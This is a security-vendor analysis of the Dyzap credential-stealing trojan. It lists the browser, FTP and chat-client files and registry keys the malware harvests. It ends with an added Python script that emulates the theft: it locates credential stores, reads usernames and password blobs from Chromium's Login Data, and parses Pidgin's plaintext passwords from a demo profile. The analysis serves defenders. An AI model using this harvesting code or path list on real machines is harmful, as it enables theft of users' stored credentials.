

Dyzap belongs to a family of malware designed to steal confidential information from a large number of target applications by installing a "man in the browser" component into common browsers. FortiGuard researchers recently discovered a new variant of this Trojan. Stolen information may include, but is not limited to, system information and application credentials stored on the infected system. In this blog we explain how the malware steals user accounts, acts as a keylogger, and communicates with its C&C server.

Stealing Routine

Dyzap targets more than one hundred applications, including browsers, FTP clients, and more. Because each kind of application stores credentials differently, Dyzap handles each of them differently: it reads database files, queries the registry, and copies configuration files of applications installed on the infected machine. Figure 2 shows some of the targeted applications, such as FossaMail, Postbox, and others.

Figure 2: Some of the applications the malware attempts to steal from

To better understand the different approaches Dyzap employs, we picked four applications and analyzed how Dyzap obtains login credentials from each. All of the following analysis was conducted under Windows 7 32-bit; the referenced paths may differ on other versions of Windows.

One of Dyzap's main routines steals login information from SQLite3 database files. Chromium, for example, stores login information in a file called "Login Data" or "Web Data." Using the code snippet and the hard-coded file path shown in Figure 3, the malware searches the possible directories for those files. If a file exists, it copies the content into a temporary file for further processing. To acquire the login information, it first verifies that the target is a SQLite3 file. Next, it looks up a "unique" string pattern to locate the "logins" table. Finally, it extracts the user accounts using the string patterns "password_value," "username_value," and "original_url," as shown in Figure 4.

Figure 3: Dyzap looks for the file in hard-coded directories

Figure 4: Dyzap looks for login information by hard-coded strings

A very similar routine is repeated for the other browsers in this family: Comodo Dragon, MapleStudio, Chrome, Nichrome, RockMelt, Spark, Chromium, Titan Browser, Torche, Yandex, Epic Privacy Browser, CocCoc Browser, Vivaldi, Comodo Chromodo, Superbird, Coowon, Mustang Browser, 360Browser, CatalinaGroup Citrio, Chrome SxS, Orbitum, Iridium, and Opera.

Firefox Family

For the Firefox family of browsers, Dyzap searches for the signons.sqlite and login.json files to locate and steal credentials. signons.sqlite is the SQLite credential store of older releases; the newer store (logins.json, written as login.json above) is a JSON file rather than a SQLite database, but both hold every saved username and password. These browsers include Firefox, IceDragon, Safari, K-Melon, SeaMonkey, Flok, Thunderbird, BlackHawk, Postbox, Cyberfox, and Pale Moon.

Besides database files, Dyzap also harvests confidential information from the registry for some FTP applications. For instance, for Far FTP the malware simply searches the registry paths shown in Figure 5. Upon finding them, it queries the subkey values named "Password," "User," and "HostName." The registry path for each targeted application, which may contain confidential information, is hard-coded into the malware. Table 1 lists the applications targeted through their registry keys, including:

"Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete"
"Software\NCH Software\ClassicFTP\FTPAccounts"
"Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook"
"Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook"
"Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook"

Table 1: Applications whose registry keys the malware tries to steal from

Pidgin

Another capability of Dyzap is stealing confidential information from files that store login credentials on the infected machine. Pidgin, for instance, is a chat program that lets the user log in to accounts on multiple chat networks simultaneously. It saves the login information for those accounts in an XML file, "%AppData%\Roaming\.purple\accounts.xml". Dyzap tries to find this *.xml file by searching the possible directories (Figure 6) and then copies the file to be sent later to its C&C server.

Figure 6: Possible directories to find the target file

The following table shows the applications and associated files that the malware searches for confidential information, including:

"\QupZilla\profiles\default\browsedata.db"
"\Notepad++\plugins\config\NppFTP\NppFTP.xml"
"\Microsoft\Sticky Notes\StickyNotes.snt"
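As an added example (not code from the FortiGuard write-up or from the malware itself), the Python script below emulates the file-based parts of the stealing routine described above against a constructed, throwaway profile directory: it checks which of the listed credential stores exist under a root, validates the 16-byte SQLite 3 header before touching a "Login Data" file (the assumed meaning of "verifies that the target is a SQLite3 file"), copies the database to a temporary file, reads the logins table, and parses a Pidgin accounts.xml. Assumptions: the relative Chromium path under the root, the profile layout and the sample rows are all constructed for the demo; the column names used are Chromium's actual origin_url, username_value and password_value (the post's "original_url" is not a column in that schema); on Windows, password_value is a DPAPI-protected blob that a stealer must unprotect in the victim's user context, so the script leaves it opaque. The registry-based part of the routine needs winreg on a live Windows host and is deliberately not included.

```python
"""Emulate the file-based parts of a Dyzap-style credential sweep (added example)."""
import os
import shutil
import sqlite3
import tempfile
import xml.etree.ElementTree as ET

# Every SQLite 3 database starts with this 16-byte header string.
SQLITE_MAGIC = b"SQLite format 3\x00"

# Relative paths (under an AppData-style root) of the stores named in the post.
# The Chromium and Pidgin locations are assumptions chosen for this demo.
CREDENTIAL_STORES = {
    "Chromium logins": os.path.join("Chromium", "User Data", "Default", "Login Data"),
    "Pidgin accounts": os.path.join(".purple", "accounts.xml"),
    "QupZilla browsedata": os.path.join("QupZilla", "profiles", "default", "browsedata.db"),
    "NppFTP profiles": os.path.join("Notepad++", "plugins", "config", "NppFTP", "NppFTP.xml"),
    "Sticky Notes": os.path.join("Microsoft", "Sticky Notes", "StickyNotes.snt"),
}


def is_sqlite3(path):
    """Header check: refuse to parse anything that is not a SQLite 3 file."""
    with open(path, "rb") as f:
        return f.read(len(SQLITE_MAGIC)) == SQLITE_MAGIC


def find_credential_stores(root_dir):
    """Return {label: path} for every listed store that exists under root_dir."""
    found = {}
    for label, rel in CREDENTIAL_STORES.items():
        path = os.path.join(root_dir, rel)
        if os.path.isfile(path):
            found[label] = path
    return found


def extract_chromium_logins(login_data_path):
    """Copy 'Login Data' to a temp file, then read (url, user, password blob) rows."""
    if not is_sqlite3(login_data_path):
        return []  # decoy or damaged file: the malware's header check would bail here too
    tmp = tempfile.NamedTemporaryFile(delete=False, suffix=".db")
    tmp.close()
    shutil.copyfile(login_data_path, tmp.name)
    try:
        con = sqlite3.connect(tmp.name)
        try:
            rows = con.execute(
                "SELECT origin_url, username_value, password_value FROM logins"
            ).fetchall()
        finally:
            con.close()
    finally:
        os.remove(tmp.name)
    # password_value stays an opaque blob (DPAPI-protected on Windows).
    return [(url, user, bytes(pw)) for url, user, pw in rows]


def extract_pidgin_accounts(accounts_xml_path):
    """Return (protocol, name, password) per <account> child of Pidgin's accounts.xml."""
    root = ET.parse(accounts_xml_path).getroot()
    return [(a.findtext("protocol"), a.findtext("name"), a.findtext("password"))
            for a in root.findall("account")]


def build_demo_profile():
    """Construct a throwaway root with sample (fake) stores so the sweep runs offline."""
    root = tempfile.mkdtemp(prefix="dyzap-demo-")
    login_data = os.path.join(root, CREDENTIAL_STORES["Chromium logins"])
    os.makedirs(os.path.dirname(login_data))
    con = sqlite3.connect(login_data)
    con.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)")
    con.execute("INSERT INTO logins VALUES (?, ?, ?)",
                ("https://mail.example.test/", "alice", b"\x01\x00\x00\x00DPAPI-blob"))
    con.commit()
    con.close()
    accounts = os.path.join(root, CREDENTIAL_STORES["Pidgin accounts"])
    os.makedirs(os.path.dirname(accounts))
    with open(accounts, "w") as f:  # constructed sample in Pidgin's accounts.xml layout
        f.write("<?xml version='1.0'?><account version='1.0'><account>"
                "<protocol>prpl-jabber</protocol><name>alice@example.test/Home</name>"
                "<password>hunter2</password></account></account>")
    decoy = os.path.join(root, CREDENTIAL_STORES["QupZilla browsedata"])
    os.makedirs(os.path.dirname(decoy))
    with open(decoy, "wb") as f:  # present on disk but not a SQLite file
        f.write(b"not a database")
    return root


if __name__ == "__main__":
    demo_root = build_demo_profile()
    stores = find_credential_stores(demo_root)
    print("stores present:", sorted(stores))
    print("chromium:", extract_chromium_logins(stores["Chromium logins"]))
    print("pidgin:", extract_pidgin_accounts(stores["Pidgin accounts"]))
    print("decoy parsed as sqlite:", is_sqlite3(stores["QupZilla browsedata"]))
```

Pointed at a real AppData-style root instead of the demo directory, find_credential_stores reports which of these stores a Dyzap-style stealer would find on a host; the header check matters because a file with the expected name is not necessarily the expected format, and blindly handing it to sqlite3 would raise instead of skipping.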
